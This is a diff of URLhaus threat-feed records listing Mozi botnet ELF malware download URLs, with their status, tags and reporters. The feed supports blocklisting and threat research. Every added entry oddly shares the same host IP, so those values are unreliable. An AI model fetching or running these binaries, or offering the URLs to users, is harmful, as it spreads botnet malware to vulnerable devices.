-{"id":"961335","urlhaus_reference":"https://urlhaus.abuse.ch/url/961335/","url":"http://42.230.100.168:39386/Mozi.m","url_status":"online","host":"42.230.100.168","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961322","urlhaus_reference":"https://urlhaus.abuse.ch/url/961322/","url":"http://182.121.78.100:46289/Mozi.m","url_status":"online","host":"182.121.78.100","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961323","urlhaus_reference":"https://urlhaus.abuse.ch/url/961323/","url":"http://139.190.238.2:34951/Mozi.m","url_status":"offline","host":"139.190.238.2","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961324","urlhaus_reference":"https://urlhaus.abuse.ch/url/961324/","url":"http://186.33.122.75:47594/Mozi.m","url_status":"online","host":"186.33.122.75","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961325","urlhaus_reference":"https://urlhaus.abuse.ch/url/961325/","url":"http://182.121.32.64:55792/Mozi.m","url_status":"online","host":"182.121.32.64","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961326","urlhaus_reference":"https://urlhaus.abuse.ch/url/961326/","url":"http://123.9.207.172:35271/Mozi.m","url_status":"online","host":"123.9.207.172","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961327","urlhaus_reference":"https://urlhaus.abuse.ch/url/961327/","url":"http://186.33.122.231:36300/Mozi.m","url_status":"offline","host":"186.33.122.231","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961328","urlhaus_reference":"https://urlhaus.abuse.ch/url/961328/","url":"http://182.121.128.242:60680/Mozi.m","url_status":"online","host":"182.121.128.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961329","urlhaus_reference":"https://urlhaus.abuse.ch/url/961329/","url":"http://175.172.66.144:51132/Mozi.a","url_status":"online","host":"175.172.66.144","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961330","urlhaus_reference":"https://urlhaus.abuse.ch/url/961330/","url":"http://182.116.99.242:39049/Mozi.m","url_status":"online","host":"182.116.99.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961321","urlhaus_reference":"https://urlhaus.abuse.ch/url/961321/","url":"http://117.248.62.107:57455/Mozi.m","url_status":"online","host":"117.248.62.107","date_added":"2021-01-14 19:49:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961320","urlhaus_reference":"https://urlhaus.abuse.ch/url/961320/","url":"http://117.222.172.10:32823/Mozi.m","url_status":"online","host":"117.222.172.10","date_added":"2021-01-14 19:49:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961318","urlhaus_reference":"https://urlhaus.abuse.ch/url/961318/","url":"http://101.20.171.255:44103/Mozi.a","url_status":"online","host":"101.20.171.255","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961319","urlhaus_reference":"https://urlhaus.abuse.ch/url/961319/","url":"http://117.211.62.72:36257/Mozi.m","url_status":"offline","host":"117.211.62.72","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961317","urlhaus_reference":"https://urlhaus.abuse.ch/url/961317/","url":"http://115.55.179.98:41921/bin.sh","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 19:45:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961316","urlhaus_reference":"https://urlhaus.abuse.ch/url/961316/","url":"http://182.113.226.63:50971/i","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:44:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961315","urlhaus_reference":"https://urlhaus.abuse.ch/url/961315/","url":"http://59.96.39.120:56339/Mozi.m","url_status":"offline","host":"59.96.39.120","date_added":"2021-01-14 19:36:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961314","urlhaus_reference":"https://urlhaus.abuse.ch/url/961314/","url":"http://221.15.198.146:52551/Mozi.m","url_status":"online","host":"221.15.198.146","date_added":"2021-01-14 19:36:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961312","urlhaus_reference":"https://urlhaus.abuse.ch/url/961312/","url":"http://182.126.93.114:35942/Mozi.m","url_status":"online","host":"182.126.93.114","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961313","urlhaus_reference":"https://urlhaus.abuse.ch/url/961313/","url":"http://188.19.182.164:39636/Mozi.a","url_status":"online","host":"188.19.182.164","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961310","urlhaus_reference":"https://urlhaus.abuse.ch/url/961310/","url":"http://59.0.6.131:53548/Mozi.m","url_status":"offline","host":"59.0.6.131","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961311","urlhaus_reference":"https://urlhaus.abuse.ch/url/961311/","url":"http://45.160.145.247:40967/Mozi.m","url_status":"online","host":"45.160.145.247","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961309","urlhaus_reference":"https://urlhaus.abuse.ch/url/961309/","url":"http://186.33.104.195:49471/Mozi.m","url_status":"online","host":"186.33.104.195","date_added":"2021-01-14 19:36:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961302","urlhaus_reference":"https://urlhaus.abuse.ch/url/961302/","url":"http://42.224.172.5:43937/Mozi.m","url_status":"online","host":"42.224.172.5","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961303","urlhaus_reference":"https://urlhaus.abuse.ch/url/961303/","url":"http://182.126.89.215:57992/Mozi.a","url_status":"online","host":"182.126.89.215","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961304","urlhaus_reference":"https://urlhaus.abuse.ch/url/961304/","url":"http://27.219.111.198:43603/Mozi.m","url_status":"online","host":"27.219.111.198","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961305","urlhaus_reference":"https://urlhaus.abuse.ch/url/961305/","url":"http://27.219.76.18:37157/Mozi.a","url_status":"online","host":"27.219.76.18","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961306","urlhaus_reference":"https://urlhaus.abuse.ch/url/961306/","url":"http://185.246.178.200:37229/Mozi.m","url_status":"online","host":"185.246.178.200","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961307","urlhaus_reference":"https://urlhaus.abuse.ch/url/961307/","url":"http://222.136.88.171:49104/Mozi.m","url_status":"online","host":"222.136.88.171","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961308","urlhaus_reference":"https://urlhaus.abuse.ch/url/961308/","url":"http://61.53.193.78:49575/Mozi.m","url_status":"online","host":"61.53.193.78","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961299","urlhaus_reference":"https://urlhaus.abuse.ch/url/961299/","url":"http://112.234.38.83:50000/Mozi.a","url_status":"online","host":"112.234.38.83","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961300","urlhaus_reference":"https://urlhaus.abuse.ch/url/961300/","url":"http://115.50.226.131:36251/Mozi.m","url_status":"online","host":"115.50.226.131","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961301","urlhaus_reference":"https://urlhaus.abuse.ch/url/961301/","url":"http://116.25.134.26:51932/Mozi.m","url_status":"online","host":"116.25.134.26","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961297","urlhaus_reference":"https://urlhaus.abuse.ch/url/961297/","url":"http://116.75.197.211:45660/Mozi.m","url_status":"online","host":"116.75.197.211","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961298","urlhaus_reference":"https://urlhaus.abuse.ch/url/961298/","url":"http://112.240.79.242:42478/Mozi.m","url_status":"online","host":"112.240.79.242","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961296","urlhaus_reference":"https://urlhaus.abuse.ch/url/961296/","url":"http://103.243.184.54:50726/Mozi.m","url_status":"online","host":"103.243.184.54","date_added":"2021-01-14 19:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961295","urlhaus_reference":"https://urlhaus.abuse.ch/url/961295/","url":"http://59.99.93.45:40256/i","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:33:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961294","urlhaus_reference":"https://urlhaus.abuse.ch/url/961294/","url":"http://182.113.226.63:50971/bin.sh","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:29:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961403","urlhaus_reference":"https://urlhaus.abuse.ch/url/961403/","url":"http://89.160.20.156:50611/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:39:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961402","urlhaus_reference":"https://urlhaus.abuse.ch/url/961402/","url":"http://89.160.20.156:45371/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961400","urlhaus_reference":"https://urlhaus.abuse.ch/url/961400/","url":"http://89.160.20.156:50093/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961401","urlhaus_reference":"https://urlhaus.abuse.ch/url/961401/","url":"http://89.160.20.156:36652/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961397","urlhaus_reference":"https://urlhaus.abuse.ch/url/961397/","url":"http://89.160.20.156:54182/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961398","urlhaus_reference":"https://urlhaus.abuse.ch/url/961398/","url":"http://89.160.20.156:46048/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961399","urlhaus_reference":"https://urlhaus.abuse.ch/url/961399/","url":"http://89.160.20.156:33953/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961393","urlhaus_reference":"https://urlhaus.abuse.ch/url/961393/","url":"http://89.160.20.156:36447/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961394","urlhaus_reference":"https://urlhaus.abuse.ch/url/961394/","url":"http://89.160.20.156:36828/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961395","urlhaus_reference":"https://urlhaus.abuse.ch/url/961395/","url":"http://89.160.20.156:55281/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961396","urlhaus_reference":"https://urlhaus.abuse.ch/url/961396/","url":"http://89.160.20.156:49772/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961391","urlhaus_reference":"https://urlhaus.abuse.ch/url/961391/","url":"http://89.160.20.156:50229/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961392","urlhaus_reference":"https://urlhaus.abuse.ch/url/961392/","url":"http://89.160.20.156:39996/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961387","urlhaus_reference":"https://urlhaus.abuse.ch/url/961387/","url":"http://89.160.20.156:50195/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961388","urlhaus_reference":"https://urlhaus.abuse.ch/url/961388/","url":"http://89.160.20.156:52447/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961389","urlhaus_reference":"https://urlhaus.abuse.ch/url/961389/","url":"http://89.160.20.156:56321/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961390","urlhaus_reference":"https://urlhaus.abuse.ch/url/961390/","url":"http://89.160.20.156:54620/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961386","urlhaus_reference":"https://urlhaus.abuse.ch/url/961386/","url":"http://89.160.20.156:52064/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:23:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961385","urlhaus_reference":"https://urlhaus.abuse.ch/url/961385/","url":"http://89.160.20.156:47401/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961382","urlhaus_reference":"https://urlhaus.abuse.ch/url/961382/","url":"http://89.160.20.156:46527/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961383","urlhaus_reference":"https://urlhaus.abuse.ch/url/961383/","url":"http://89.160.20.156:38132/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961384","urlhaus_reference":"https://urlhaus.abuse.ch/url/961384/","url":"http://89.160.20.156:59015/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961379","urlhaus_reference":"https://urlhaus.abuse.ch/url/961379/","url":"http://89.160.20.156:59454/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961380","urlhaus_reference":"https://urlhaus.abuse.ch/url/961380/","url":"http://89.160.20.156:37883/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961381","urlhaus_reference":"https://urlhaus.abuse.ch/url/961381/","url":"http://89.160.20.156:55209/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961378","urlhaus_reference":"https://urlhaus.abuse.ch/url/961378/","url":"http://89.160.20.156:41062/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961377","urlhaus_reference":"https://urlhaus.abuse.ch/url/961377/","url":"http://89.160.20.156:60380/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961375","urlhaus_reference":"https://urlhaus.abuse.ch/url/961375/","url":"http://89.160.20.156:54796/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961376","urlhaus_reference":"https://urlhaus.abuse.ch/url/961376/","url":"http://89.160.20.156:35251/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961373","urlhaus_reference":"https://urlhaus.abuse.ch/url/961373/","url":"http://89.160.20.156:50562/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961374","urlhaus_reference":"https://urlhaus.abuse.ch/url/961374/","url":"http://89.160.20.156:33445/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961370","urlhaus_reference":"https://urlhaus.abuse.ch/url/961370/","url":"http://89.160.20.156:60280/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961371","urlhaus_reference":"https://urlhaus.abuse.ch/url/961371/","url":"http://89.160.20.156:46386/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961372","urlhaus_reference":"https://urlhaus.abuse.ch/url/961372/","url":"http://89.160.20.156:60288/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961368","urlhaus_reference":"https://urlhaus.abuse.ch/url/961368/","url":"http://89.160.20.156:49731/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961369","urlhaus_reference":"https://urlhaus.abuse.ch/url/961369/","url":"http://89.160.20.156:38837/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961366","urlhaus_reference":"https://urlhaus.abuse.ch/url/961366/","url":"http://89.160.20.156:37814/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961367","urlhaus_reference":"https://urlhaus.abuse.ch/url/961367/","url":"http://89.160.20.156:47507/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961365","urlhaus_reference":"https://urlhaus.abuse.ch/url/961365/","url":"http://89.160.20.156:47140/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:18:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961363","urlhaus_reference":"https://urlhaus.abuse.ch/url/961363/","url":"http://89.160.20.156:41514/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961364","urlhaus_reference":"https://urlhaus.abuse.ch/url/961364/","url":"http://89.160.20.156:58748/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961362","urlhaus_reference":"https://urlhaus.abuse.ch/url/961362/","url":"http://89.160.20.156:51183/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961361","urlhaus_reference":"https://urlhaus.abuse.ch/url/961361/","url":"http://89.160.20.156:42104/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961354","urlhaus_reference":"https://urlhaus.abuse.ch/url/961354/","url":"http://89.160.20.156:53130/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961355","urlhaus_reference":"https://urlhaus.abuse.ch/url/961355/","url":"http://89.160.20.156:57768/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 